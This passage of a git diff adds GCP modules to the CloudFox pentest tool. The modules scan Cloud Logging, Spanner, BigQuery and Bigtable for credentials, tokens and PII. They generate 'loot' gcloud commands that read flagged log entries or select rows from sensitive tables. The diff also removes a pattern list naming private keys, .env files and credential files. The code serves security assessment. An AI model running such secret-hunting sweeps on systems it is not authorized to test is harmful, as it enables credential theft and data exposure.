BigtableEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } +} + +func (m *BigtableEnumModule) writeBigtableFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "bigtable-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := BigtableEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_BIGTABLEENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/logenum.go b/gcp/commands/logenum.go new file mode 100644 index 00000000..57fb4b4a --- /dev/null +++ b/gcp/commands/logenum.go @@ -0,0 +1,277 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + logenumservice "github.com/BishopFox/cloudfox/gcp/services/logEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var ( + logEnumHours int + logEnumMaxEntries int + logEnumLogName string +) + +var GCPLogEnumCommand = &cobra.Command{ + Use: globals.GCP_LOGENUM_MODULE_NAME, + Aliases: []string{"log-scan", "sensitive-logs"}, + Short: "Scan Cloud Logging entries for sensitive data (credentials, tokens, PII)", + Long: `Scan Cloud Logging entries for potentially sensitive data. + +This module reads recent log entries and applies content-based pattern matching +to detect credentials, secrets, tokens, PII, and other sensitive information +that may have been inadvertently logged. + +Content patterns detected: +- Credentials: GCP SA keys, private keys, AWS access keys, API keys +- Secrets: Password assignments, bearer tokens, connection strings +- Tokens: JWTs, OAuth tokens, GitHub tokens +- PII: Credit card numbers, SSN patterns + +Flags: + --hours Hours of logs to scan (default 168 = 7 days) + --max-entries Maximum log entries to process per project (default 50000) + --log-name Optional: filter to a specific log name`, + Run: runGCPLogEnumCommand, +} + +func init() { + GCPLogEnumCommand.Flags().IntVar(&logEnumHours, "hours", 168, "Hours of logs to scan (default 168 = 7 days)") + GCPLogEnumCommand.Flags().IntVar(&logEnumMaxEntries, "max-entries", 50000, "Maximum log entries to process per project") + GCPLogEnumCommand.Flags().StringVar(&logEnumLogName, "log-name", "", "Optional: filter to a specific log name") +} + +type LogEnumModule struct { + gcpinternal.BaseGCPModule + ProjectEntries map[string][]logenumservice.SensitiveLogEntry + LootMap map[string]map[string]*internal.LootFile + Hours int + MaxEntries int + LogNameFilter string + mu sync.Mutex +} + +type LogEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o LogEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o LogEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPLogEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_LOGENUM_MODULE_NAME) + if err != nil { + return + } + + module := &LogEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEntries: make(map[string][]logenumservice.SensitiveLogEntry), + LootMap: make(map[string]map[string]*internal.LootFile), + Hours: logEnumHours, + MaxEntries: logEnumMaxEntries, + LogNameFilter: logEnumLogName, + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *LogEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Scanning log entries (last %d hours, max %d entries per project)...", + m.Hours, m.MaxEntries), globals.GCP_LOGENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGENUM_MODULE_NAME, m.processProject) + + allEntries := m.getAllEntries() + if len(allEntries) == 0 { + logger.InfoM("No sensitive log entries found", globals.GCP_LOGENUM_MODULE_NAME) + return + } + + // Count by risk level + criticalCount := 0 + highCount := 0 + for _, entry := range allEntries { + switch entry.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive log entries (%d CRITICAL, %d HIGH)", + len(allEntries), criticalCount, highCount), globals.GCP_LOGENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *LogEnumModule) getAllEntries() []logenumservice.SensitiveLogEntry { + var all []logenumservice.SensitiveLogEntry + for _, entries := range m.ProjectEntries { + all = append(all, entries...) + } + return all +} + +func (m *LogEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning logs in project: %s", projectID), globals.GCP_LOGENUM_MODULE_NAME) + } + + svc := logenumservice.New() + + entries, err := svc.EnumerateSensitiveLogs(projectID, m.Hours, m.MaxEntries, m.LogNameFilter) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGENUM_MODULE_NAME, + fmt.Sprintf("Could not scan logs in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectEntries[projectID] = entries + + // Build loot + if len(entries) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "log-enum-commands", + Contents: "# Cloud Logging Read Commands for Sensitive Entries\n# Generated by CloudFox\n\n", + } + for _, entry := range entries { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s (%s)\ngcloud logging read 'insertId=\"%s\"' --project=%s --format=json\n\n", + entry.RiskLevel, entry.Category, entry.Description, entry.Timestamp, + entry.InsertID, projectID, + ) + } + m.LootMap[projectID]["log-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *LogEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *LogEnumModule) getHeader() []string { + return []string{"Project", "Log Name", "Timestamp", "Category", "Risk Level", "Description", "Resource Type", "Snippet"} +} + +func (m *LogEnumModule) entriesToTableBody(entries []logenumservice.SensitiveLogEntry) [][]string { + var body [][]string + for _, entry := range entries { + // Shorten log name for display + shortLogName := entry.LogName + if idx := strings.LastIndex(shortLogName, "/"); idx >= 0 { + shortLogName = shortLogName[idx+1:] + } + body = append(body, []string{ + m.GetProjectName(entry.ProjectID), + shortLogName, + entry.Timestamp, + entry.Category, + entry.RiskLevel, + entry.Description, + entry.ResourceType, + entry.Snippet, + }) + } + return body +} + +func (m *LogEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + entries := m.ProjectEntries[projectID] + if len(entries) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "log-enum", + Header: m.getHeader(), + Body: m.entriesToTableBody(entries), + }, + } +} + +func (m *LogEnumModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, entries := range m.ProjectEntries { + if len(entries) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = LogEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_LOGENUM_MODULE_NAME) + } +} + +func (m *LogEnumModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEntries := m.getAllEntries() + if len(allEntries) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "log-enum", + Header: m.getHeader(), + Body: m.entriesToTableBody(allEntries), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := LogEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGENUM_MODULE_NAME) + } +} diff --git a/gcp/commands/spannerenum.go b/gcp/commands/spannerenum.go new file mode 100644 index 00000000..edab5eef --- /dev/null +++ b/gcp/commands/spannerenum.go @@ -0,0 +1,247 @@ +package commands + +import ( + "context" + "fmt" + "sync" + + spannerenumservice "github.com/BishopFox/cloudfox/gcp/services/spannerEnumService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPSpannerEnumCommand = &cobra.Command{ + Use: globals.GCP_SPANNERENUM_MODULE_NAME, + Aliases: []string{"spanner-scan"}, + Short: "Scan Spanner database schemas for sensitive table and column names", + Long: `Scan Spanner database DDL for potentially sensitive data. + +Retrieves DDL (CREATE TABLE statements) from all Spanner databases and parses +table names and column names, checking them against sensitive data patterns. + +Detects resources with names suggesting they store: +- Credentials, tokens, or secrets +- PII (SSN, credit cards) +- Financial data (payments, billing, salary) +- Compliance-labeled data (HIPAA, GDPR, PII)`, + Run: runGCPSpannerEnumCommand, +} + +type SpannerEnumModule struct { + gcpinternal.BaseGCPModule + ProjectResources map[string][]spannerenumservice.SensitiveSpannerResource + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +type SpannerEnumOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o SpannerEnumOutput) TableFiles() []internal.TableFile { return o.Table } +func (o SpannerEnumOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPSpannerEnumCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SPANNERENUM_MODULE_NAME) + if err != nil { + return + } + + module := &SpannerEnumModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectResources: make(map[string][]spannerenumservice.SensitiveSpannerResource), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *SpannerEnumModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Scanning Spanner database schemas for sensitive data indicators...", globals.GCP_SPANNERENUM_MODULE_NAME) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SPANNERENUM_MODULE_NAME, m.processProject) + + allResources := m.getAllResources() + if len(allResources) == 0 { + logger.InfoM("No sensitive Spanner resources found", globals.GCP_SPANNERENUM_MODULE_NAME) + return + } + + criticalCount := 0 + highCount := 0 + for _, r := range allResources { + switch r.RiskLevel { + case "CRITICAL": + criticalCount++ + case "HIGH": + highCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d sensitive Spanner resources (%d CRITICAL, %d HIGH)", + len(allResources), criticalCount, highCount), globals.GCP_SPANNERENUM_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *SpannerEnumModule) getAllResources() []spannerenumservice.SensitiveSpannerResource { + var all []spannerenumservice.SensitiveSpannerResource + for _, resources := range m.ProjectResources { + all = append(all, resources...) + } + return all +} + +func (m *SpannerEnumModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning Spanner in project: %s", projectID), globals.GCP_SPANNERENUM_MODULE_NAME) + } + + svc := spannerenumservice.New() + + resources, err := svc.EnumerateSensitiveResources(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNERENUM_MODULE_NAME, + fmt.Sprintf("Could not scan Spanner in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectResources[projectID] = resources + + if len(resources) > 0 { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + lootFile := &internal.LootFile{ + Name: "spanner-enum-commands", + Contents: "# Spanner Commands for Sensitive Resources\n# Generated by CloudFox\n\n", + } + for _, r := range resources { + if r.Table != "" { + lootFile.Contents += fmt.Sprintf( + "# [%s] %s - %s/%s/%s\n# %s\ngcloud spanner databases execute-sql %s --instance=%s --project=%s --sql='SELECT * FROM %s LIMIT 10'\n\n", + r.RiskLevel, r.Category, r.Instance, r.Database, r.Table, + r.Description, + r.Database, r.Instance, projectID, r.Table, + ) + } + } + m.LootMap[projectID]["spanner-enum-commands"] = lootFile + } + m.mu.Unlock() +} + +func (m *SpannerEnumModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeSpannerHierarchicalOutput(ctx, logger) + } else { + m.writeSpannerFlatOutput(ctx, logger) + } +} + +func (m *SpannerEnumModule) getHeader() []string { + return []string{"Project", "Instance", "Database", "Table", "Column", "Category", "Risk Level", "Description"} +} + +func (m *SpannerEnumModule) resourcesToTableBody(resources []spannerenumservice.SensitiveSpannerResource) [][]string { + var body [][]string + for _, r := range resources { + body = append(body, []string{ + m.GetProjectName(r.ProjectID), + r.Instance, + r.Database, + r.Table, + r.Column, + r.Category, + r.RiskLevel, + r.Description, + }) + } + return body +} + +func (m *SpannerEnumModule) buildTablesForProject(projectID string) []internal.TableFile { + resources := m.ProjectResources[projectID] + if len(resources) == 0 { + return nil + } + return []internal.TableFile{ + { + Name: "spanner-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(resources), + }, + } +} + +func (m *SpannerEnumModule) writeSpannerHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, resources := range m.ProjectResources { + if len(resources) == 0 { + continue + } + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = SpannerEnumOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_SPANNERENUM_MODULE_NAME) + } +} + +func (m *SpannerEnumModule) writeSpannerFlatOutput(ctx context.Context, logger internal.Logger) { + allResources := m.getAllResources() + if len(allResources) == 0 { + return + } + + tables := []internal.TableFile{ + { + Name: "spanner-enum", + Header: m.getHeader(), + Body: m.resourcesToTableBody(allResources), + }, + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := SpannerEnumOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SPANNERENUM_MODULE_NAME) + } +} diff --git a/gcp/services/bigqueryEnumService/bigqueryEnumService.go b/gcp/services/bigqueryEnumService/bigqueryEnumService.go new file mode 100644 index 00000000..c388d7d5 --- /dev/null +++ b/gcp/services/bigqueryEnumService/bigqueryEnumService.go @@ -0,0 +1,233 @@ +package bigqueryenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigquery "google.golang.org/api/bigquery/v2" +) + +type BigQueryEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BigQueryEnumService { + return &BigQueryEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigQueryEnumService { + return &BigQueryEnumService{session: session} +} + +// SensitiveBQResource represents a BigQuery resource flagged as potentially sensitive. +type SensitiveBQResource struct { + ProjectID string `json:"projectId"` + Dataset string `json:"dataset"` + Table string `json:"table"` + Column string `json:"column"` + MatchType string `json:"matchType"` // "name" or "content" + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getBigQueryService returns a BigQuery service client. +func (s *BigQueryEnumService) getBigQueryService(ctx context.Context) (*bigquery.Service, error) { + return bigquery.NewService(ctx) +} + +// EnumerateSensitiveResources scans BigQuery metadata for sensitive resource names. +func (s *BigQueryEnumService) EnumerateSensitiveResources(projectID string, maxTables int, sampleData bool, maxRows int) ([]SensitiveBQResource, error) { + ctx := context.Background() + + service, err := s.getBigQueryService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + contentPatterns := shared.GetContentPatterns() + + var resources []SensitiveBQResource + tableCount := 0 + + // List datasets + datasetsResp, err := service.Datasets.List(projectID).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigquery.googleapis.com") + } + + for _, ds := range datasetsResp.Datasets { + datasetID := ds.DatasetReference.DatasetId + + // Check dataset name + if match := shared.MatchResourceName(datasetID, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Dataset name: %s", match.Description), + }) + } + + // List tables in dataset + tablesResp, err := service.Tables.List(projectID, datasetID).Context(ctx).Do() + if err != nil { + continue + } + + for _, tbl := range tablesResp.Tables { + if maxTables > 0 && tableCount >= maxTables { + break + } + tableCount++ + + tableID := tbl.TableReference.TableId + + // Check table name + if match := shared.MatchResourceName(tableID, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Get table schema to check column names + tableDetail, err := service.Tables.Get(projectID, datasetID, tableID).Context(ctx).Do() + if err != nil { + continue + } + + if tableDetail.Schema != nil { + for _, field := range tableDetail.Schema.Fields { + if match := shared.MatchResourceName(field.Name, namePatterns); match != nil { + resources = append(resources, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + Column: field.Name, + MatchType: "name", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column name: %s", match.Description), + }) + } + } + } + + // Phase 2: Optional data sampling + if sampleData && wasTableFlagged(resources, projectID, datasetID, tableID) { + sampleResults := s.sampleTableData(ctx, service, projectID, datasetID, tableID, maxRows, contentPatterns) + resources = append(resources, sampleResults...) + } + } + + if maxTables > 0 && tableCount >= maxTables { + break + } + } + + return resources, nil +} + +// wasTableFlagged checks if a table was already flagged by name matching. +func wasTableFlagged(resources []SensitiveBQResource, projectID, dataset, table string) bool { + for _, r := range resources { + if r.ProjectID == projectID && r.Dataset == dataset && r.Table == table { + return true + } + } + return false +} + +// sampleTableData runs a SELECT query on a flagged table and scans results. +func (s *BigQueryEnumService) sampleTableData(ctx context.Context, service *bigquery.Service, projectID, datasetID, tableID string, maxRows int, patterns []shared.ContentPattern) []SensitiveBQResource { + var results []SensitiveBQResource + + query := fmt.Sprintf("SELECT * FROM `%s.%s.%s` LIMIT %d", projectID, datasetID, tableID, maxRows) + + useLegacySQL := false + job := &bigquery.Job{ + Configuration: &bigquery.JobConfiguration{ + Query: &bigquery.JobConfigurationQuery{ + Query: query, + UseLegacySql: &useLegacySQL, + ForceSendFields: []string{"UseLegacySql"}, + }, + }, + } + + insertedJob, err := service.Jobs.Insert(projectID, job).Context(ctx).Do() + if err != nil { + return results + } + + // Wait for query to complete (simple polling) + for { + status, err := service.Jobs.Get(projectID, insertedJob.JobReference.JobId).Context(ctx).Do() + if err != nil { + return results + } + if status.Status.State == "DONE" { + if status.Status.ErrorResult != nil { + return results + } + break + } + } + + // Get results + queryResults, err := service.Jobs.GetQueryResults(projectID, insertedJob.JobReference.JobId).Context(ctx).Do() + if err != nil { + return results + } + + // Scan each row + for _, row := range queryResults.Rows { + for _, cell := range row.F { + cellStr := fmt.Sprintf("%v", cell.V) + if cellStr == "" || cellStr == "" { + continue + } + matches := shared.MatchContent(cellStr, patterns) + for _, match := range matches { + results = append(results, SensitiveBQResource{ + ProjectID: projectID, + Dataset: datasetID, + Table: tableID, + MatchType: "content", + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Data content: %s", match.Description), + }) + break // One match per cell is sufficient + } + } + } + + // Deduplicate content matches per table + return deduplicateByCategory(results) +} + +func deduplicateByCategory(resources []SensitiveBQResource) []SensitiveBQResource { + seen := make(map[string]bool) + var result []SensitiveBQResource + for _, r := range resources { + key := strings.Join([]string{r.ProjectID, r.Dataset, r.Table, r.Category, r.MatchType}, "|") + if !seen[key] { + seen[key] = true + result = append(result, r) + } + } + return result +} diff --git a/gcp/services/bigtableEnumService/bigtableEnumService.go b/gcp/services/bigtableEnumService/bigtableEnumService.go new file mode 100644 index 00000000..6f170632 --- /dev/null +++ b/gcp/services/bigtableEnumService/bigtableEnumService.go @@ -0,0 +1,121 @@ +package bigtableenumservice + +import ( + "context" + "fmt" + "strings" + + "github.com/BishopFox/cloudfox/gcp/shared" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" +) + +type BigtableEnumService struct { + session *gcpinternal.SafeSession +} + +func New() *BigtableEnumService { + return &BigtableEnumService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *BigtableEnumService { + return &BigtableEnumService{session: session} +} + +// SensitiveBTResource represents a Bigtable resource flagged as potentially sensitive. +type SensitiveBTResource struct { + ProjectID string `json:"projectId"` + Instance string `json:"instance"` + Table string `json:"table"` + ColumnFamily string `json:"columnFamily"` + Category string `json:"category"` + RiskLevel string `json:"riskLevel"` + Description string `json:"description"` +} + +// getBigtableAdminService returns a Bigtable Admin service client. +func (s *BigtableEnumService) getBigtableAdminService(ctx context.Context) (*bigtableadmin.Service, error) { + return bigtableadmin.NewService(ctx) +} + +// EnumerateSensitiveResources scans Bigtable metadata for sensitive resource names. +func (s *BigtableEnumService) EnumerateSensitiveResources(projectID string) ([]SensitiveBTResource, error) { + ctx := context.Background() + + service, err := s.getBigtableAdminService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + namePatterns := shared.GetNamePatterns() + var resources []SensitiveBTResource + + // List instances + parent := fmt.Sprintf("projects/%s", projectID) + instancesResp, err := service.Projects.Instances.List(parent).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "bigtableadmin.googleapis.com") + } + + for _, instance := range instancesResp.Instances { + instanceName := extractName(instance.Name) + + // Check instance name + if match := shared.MatchResourceName(instanceName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Instance name: %s", match.Description), + }) + } + + // List tables + tablesResp, err := service.Projects.Instances.Tables.List(instance.Name).Context(ctx).Do() + if err != nil { + continue + } + + for _, table := range tablesResp.Tables { + tableName := extractName(table.Name) + + // Check table name + if match := shared.MatchResourceName(tableName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Table: tableName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Table name: %s", match.Description), + }) + } + + // Check column family names + for cfName := range table.ColumnFamilies { + if match := shared.MatchResourceName(cfName, namePatterns); match != nil { + resources = append(resources, SensitiveBTResource{ + ProjectID: projectID, + Instance: instanceName, + Table: tableName, + ColumnFamily: cfName, + Category: match.Category, + RiskLevel: match.RiskLevel, + Description: fmt.Sprintf("Column family name: %s", match.Description), + }) + } + } + } + } + + return resources, nil +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} diff --git a/gcp/services/bucketEnumService/bucketEnumService.go b/gcp/services/bucketEnumService/bucketEnumService.go index 748792aa..14b3492a 100644 --- a/gcp/services/bucketEnumService/bucketEnumService.go +++ b/gcp/services/bucketEnumService/bucketEnumService.go @@ -3,9 +3,9 @@ package bucketenumservice import ( "context" "fmt" - "path/filepath" "strings" + "github.com/BishopFox/cloudfox/gcp/shared" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" "google.golang.org/api/iterator" @@ -49,85 +49,6 @@ type SensitiveFileInfo struct { Encryption string `json:"encryption"` // Encryption type (Google-managed or CMEK key name) } -// SensitivePatterns defines patterns to search for sensitive files -type SensitivePattern struct { - Pattern string - Category string - RiskLevel string - Description string -} - -// GetSensitivePatterns returns all patterns to check for sensitive files -func GetSensitivePatterns() []SensitivePattern { - return []SensitivePattern{ - // Credentials - CRITICAL - {Pattern: ".json", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key file"}, - {Pattern: "credentials.json", Category: "Credential", RiskLevel: "CRITICAL", Description: "GCP credentials file"}, - {Pattern: "service-account", Category: "Credential", RiskLevel: "CRITICAL", Description: "Service account key"}, - {Pattern: "keyfile", Category: "Credential", RiskLevel: "CRITICAL", Description: "Key file"}, - {Pattern: ".pem", Category: "Credential", RiskLevel: "CRITICAL", Description: "PEM private key"}, - {Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key file"}, - {Pattern: ".p12", Category: "Credential", RiskLevel: "CRITICAL", Description: "PKCS12 key file"}, - {Pattern: ".pfx", Category: "Credential", RiskLevel: "CRITICAL", Description: "PFX certificate file"}, - {Pattern: "id_rsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key"}, - {Pattern: "id_ed25519", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ed25519)"}, - {Pattern: "id_ecdsa", Category: "Credential", RiskLevel: "CRITICAL", Description: "SSH private key (ECDSA)"}, - - // Secrets - CRITICAL/HIGH - {Pattern: ".env", Category: "Secret", RiskLevel: "CRITICAL", Description: "Environment variables (may contain secrets)"}, - {Pattern: "secrets", Category: "Secret", RiskLevel: "HIGH", Description: "Secrets file or directory"}, - {Pattern: "password", Category: "Secret", RiskLevel: "HIGH", Description: "Password file"}, - {Pattern: "api_key", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, - {Pattern: "apikey", Category: "Secret", RiskLevel: "HIGH", Description: "API key file"}, - {Pattern: "token", Category: "Secret", RiskLevel: "HIGH", Description: "Token file"}, - {Pattern: "auth", Category: "Secret", RiskLevel: "HIGH", Description: "Authentication file"}, - {Pattern: ".htpasswd", Category: "Secret", RiskLevel: "HIGH", Description: "HTTP password file"}, - {Pattern: ".netrc", Category: "Secret", RiskLevel: "HIGH", Description: "FTP/other credentials"}, - - // Config files - HIGH/MEDIUM - {Pattern: "config", Category: "Config", RiskLevel: "MEDIUM", Description: "Configuration file"}, - {Pattern: ".yaml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, - {Pattern: ".yml", Category: "Config", RiskLevel: "MEDIUM", Description: "YAML config (may contain secrets)"}, - {Pattern: "application.properties", Category: "Config", RiskLevel: "HIGH", Description: "Java app config"}, - {Pattern: "web.config", Category: "Config", RiskLevel: "HIGH", Description: ".NET config"}, - {Pattern: "appsettings.json", Category: "Config", RiskLevel: "HIGH", Description: ".NET app settings"}, - {Pattern: "settings.py", Category: "Config", RiskLevel: "HIGH", Description: "Django settings"}, - {Pattern: "database.yml", Category: "Config", RiskLevel: "HIGH", Description: "Rails database config"}, - {Pattern: "wp-config.php", Category: "Config", RiskLevel: "HIGH", Description: "WordPress config"}, - {Pattern: ".npmrc", Category: "Config", RiskLevel: "HIGH", Description: "NPM config (may contain tokens)"}, - {Pattern: ".dockercfg", Category: "Config", RiskLevel: "HIGH", Description: "Docker registry credentials"}, - {Pattern: "docker-compose", Category: "Config", RiskLevel: "MEDIUM", Description: "Docker compose config"}, - {Pattern: "terraform.tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state (contains secrets)"}, - {Pattern: 